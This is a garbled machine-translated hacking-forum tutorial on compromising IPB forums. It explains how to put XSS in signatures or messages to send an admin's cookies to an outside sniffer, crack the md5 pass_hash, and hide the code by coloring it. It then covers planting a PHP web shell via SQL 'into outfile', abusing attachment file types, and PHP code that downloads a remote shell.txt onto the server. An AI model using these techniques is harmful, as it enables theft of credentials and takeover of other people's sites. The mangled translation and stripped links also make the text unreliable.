Хакерски бази данни; чрез IPB форум XSS файла - софтуер портални игри, хакове, завой, статии

Предишен ◈ Следващото

По принцип, аз намерих начин да проникна в сайта и след това на базата данни чрез IPB форум с XSS.

Какво е XSS?
XSS (английски Sross сайта Ssrirting -. "XSS") - тип на уязвимост

интерактивни информационни системи в интернет. XSS случва, когато сървърът генерирани

страница по някаква причина се получи потребителски скриптове. Спецификата на такива атаки

Тя се крие във факта, че те са, вместо само на атаките на сървъра и уязвимости в системата

сървър като клиент на атака инструменти.

Понякога терминът се използва за намаляване на «CSS», но да се избегне объркване с каскаден

стилове, съкратено «XSS».

XSS сега съставляват около 15% от всички слаби места открити [1]. дълго

програмистите не обръщат достатъчно внимание на тях, като се има предвид обезвреждането им. Все пак, това мнение

погрешно: на страницата, или [могат да виждат линкове Само регистрирани и активирани потребители] могат да бъдат много чувствителни данни (например,

администратор сесия ID). Популярният онлайн скриптът може да организира

DoS-ataky.
Vzde работи, когато е налице акроним таг

Пример популярните сървъри: Астериос ([могат да виждат линкове Само регистрирани и активирани потребители])

XSS ще работи на сътресения, но позволи там твърде дълго съобщение (подпис) и

Мнение забранено тези тагове.

Първо, трябва да знаем дали са включени в метода на онлайн TRACE, ако този метод е активиран

тогава ще бъде много по-лесен достъп до администраторския панел.

Първо трябва да се регистрирате онлайн за подслушване, аз избрах този

OnLine обучени || XakNet ([могат да виждат линкове Само регистрирани и активирани потребители])

1) Когато мишката е над _______________. otpravlyayutsya трупи до обучени.

] __________________________________________________ ____________________________
[/ Инициали]
2) Този код автоматично (дори и мишката не постави нещата) изпраща лог да помиришат, НО!

Работи само в Opera!
[/ Инициали]
] [/ Инициали]

вмъква в кода (по-горе)

Сега отиваме на форума, които искат да проникна и pishim ново съобщение, за да проверите сами

[Връзки са видими Само регистрирани и активирани потребители]

натиснете изпрати
Радвайки се на вашето съобщение в пощенската си кутия, няма да има форма съобщение '> но ние не плащат

внимание (ако сте поставили втори код, който е по-висок след това преместете мишката върху текста

__________________) и отидете на нашия обучени OnLine обучени || XakNet ([могат да виждат линкове Само регистрирани и активирани потребители])
И погледнете трупи
Ако дневникът не е налице тогава, че не се използва oper'y т.е. (Internet Explorer, Firefox и или

Ако трупи имат pass_hash средства микроелементи активирана.

[Връзки са видими Само регистрирани и активирани потребители]

След това направете следното:
1) Отидете в профила и кликнете върху Редактиране на подпис
2) Поставете кода си, че сте изпробвали
3) HP pishim в сайта на администратор (най-добър главен администратор) напиши всеки soobschenie.Vnimanie! ако

сте поставили код в подписа тогава вие ще бъдете необходимо да въведете код в съобщението като и т.н.

iprochtenie писма ще бъдат показани подписа си! Ако форума е забранено да се тагове

Подписи след това поставете кода в съобщението и да го изпратят на администратора. (Преди да ви постави в

подпис zamaskkiruyte, че нищо не се вижда в nebylo подписването на този, виж по-нататък)
4) Чакаме когато администраторът е прочел съобщението и лог файловете ще бъдат във вашия обучени.
5) След получаване на бисквитки (трупи) ще има ред

pass_hash = c18c047c77589bra989cc327509e7d5e;
18c047c77589bra989cc327509e7d5e това е единственият ни криптирана парола в md5, сега е

трябва да разшифровате го прог PasswordsPro или да използвате онлайн услуги

декриптиране.
c0llision - разпределена л.м. / md5 / NTLM парола възстановяване на мрежата ([могат да виждат линкове Само регистрирани и активирани потребители])
Hashkiller - Index - MD5 cracken в hashkiller.com ([могат да виждат линкове Само регистрирани и активирани потребители])

След разшифрован, ще бъдат изброени в рамките на прохода ще отидем до администраторския панел, където

как да се попълват в черупката изглежда по-нататък.

2.1) Също така, има и друг начин да открадне фалшив парола, ако метод TRACE е изключен или

.com зона zaregalsya поща може да бъде на pochta.com)

1) Автоматично откриване на фалшификати в рамката (работи само в операта!)
] [/ Инициали]

2) Откриването на фалшификати, когато мишката върху текста на ________. (Работи навсякъде)
__________________________________________________ _____________________] [/ ACR

И така, отново, ние изпращаме послание към себе си (виж по-горе) с кода, който е по-висока (с

Или една секунда)
Четох публикацията и прозорци са се разпространили в фалшив (Забележка

(Не забравяйте да го крие, как да направите това е описано по-долу), или по-добре

подпис, и да го изпратите на администратора в локалната мрежа. Можете също така да напишете съобщение във форума, така че

Можете да събирате паролите не са само администратори.

И така, това е като администратор нещо подозрително в подписа си и решиха proveritpodpis и

[Връзки са видими Само регистрирани и активирани потребители]

И ние се героите нещо подобно
# X68; # X74; # X74; # X70; # Х3а; # x2F; # x2F; # Х6с; # x32; # x66; # X61; # x6E; # X2d; # 64; # x6

Ако администраторът ще видите, че това е _________________________________. и той е бил на pokazhetsja на пода

подозрително, и отново погледна подписа и да получите един банан отново, за какво? за

post2
Няма да има нещо като това:
[Връзки са видими Само регистрирани и активирани потребители]
Този цвят подпис, тоест, ние се скрие цвета.
нашия код

Къде # fff7ad нашия цвят
В резултат на това ние направихме най-скритите ни код:

И така, тук отидохме в административната област и ние трябва да попълните на корпуса има няколко начина за

Подкрепа-> SQL- Management> Изпълнява protsessy-> Направи ново искане

изберете 0x3c3f706870696e666f28293b3f3e в outfile

"Z: /home/site.ru/ [могат да виждат линкове Само регистрирани и активирани потребители]"

Можете да видите пълния път, както следва:

-> [Могат да виждат линкове Само регистрирани и активирани потребители] forum.ru /? Акт = attachcode = attach_upload_remove

обвивка: [могат да виждат линкове Само регистрирани и активирани потребители]

PS: Имаме нужда от съответните права

Forumy-> Clip-файлове> Типове файлове

кликнете върху "Добавяне на нов тип" -> "Използване на всякакъв вид като база?" - изберете

"Въз основа на вида на PHP" -> "Разширяването на прикачения файл" - php3 (PHP просто трябва да

Списъкът по подразбиране и багажника автоматично преименуван на .txt) -> "MIME-тип

Ние подпечатва в профила си:

[Връзки са видими Само регистрирани и активирани потребители]

Предварително вземе rasshifrenie добавите към типовете файлове и да .phtml тип мим

снимки.
След това добавете в потребителските профили попълнете rasshifreny .phtml и всякакви размери (на

колкото повече толкова по-добре).
После тихо попълнете свойствата на обвивката и да потърсите начин до черупката.
Причините, поради които не плащам избухване: Има правата за аватарите папка или HTML / емотикони, на стойност

Отидете на "Настройки", изберете някоя от тях, ние натиснете, за да добавите нова обстановка, така и в областта

"Running PHP код
за да се покаже или да запишете настройките, "пишат всеки PHP код като този:
-----------------------------------------

$ Linky = "[могат да виждат линкове Само регистрирани и активирани потребители] sayt_s_shellom / shell.txt";
$ Запазени = "/ дома // [могат да виждат линкове Само регистрирани и активирани потребители]";
$ От = fopen ( "$ linky", "R");
$ Към = fopen ( "$ спасен", "w");
докато (! feof ($ от))<
$ String = fgets ($ от, 4096);
fputs ($ до $, низ);
>
fclose ($ до);
ехо "Готово";
fclose ($ от);

Уеб Shell се намират) google.com, за да ви помогне лично аз yuzayu
Dump.Ru - споделяне на файлове, безплатно файл хостинг, регистрация не се изисква ([могат да виждат линкове Само регистрирани и активирани потребители])
или
AK-74 Team сигурност Уеб Shell ([могат да виждат линкове Само регистрирани и активирани потребители])

След като сте попълнили в черупката и да отидете до самия корен на къде ETS да се търси място, където и настройки довереник да се свърже с базата данни.
На Астериос XSS работи само във връзка с отговора, той ще види XSS, така че е най-добре да играят на сигурно)

Този цвят подпис, тоест, ние се скрие цвета.
код:
нашия код
на [* цвят = "# fff7ad"] нашия код [/ цвят *] и да обясни, че без *

Добавен след 37 минути игра
За да не се мъчите с помощната програма за използване TRACE [могат да виждат линкове Само регистрирани и активирани потребители]
Тя ще ви покаже дали не микроелементи активиран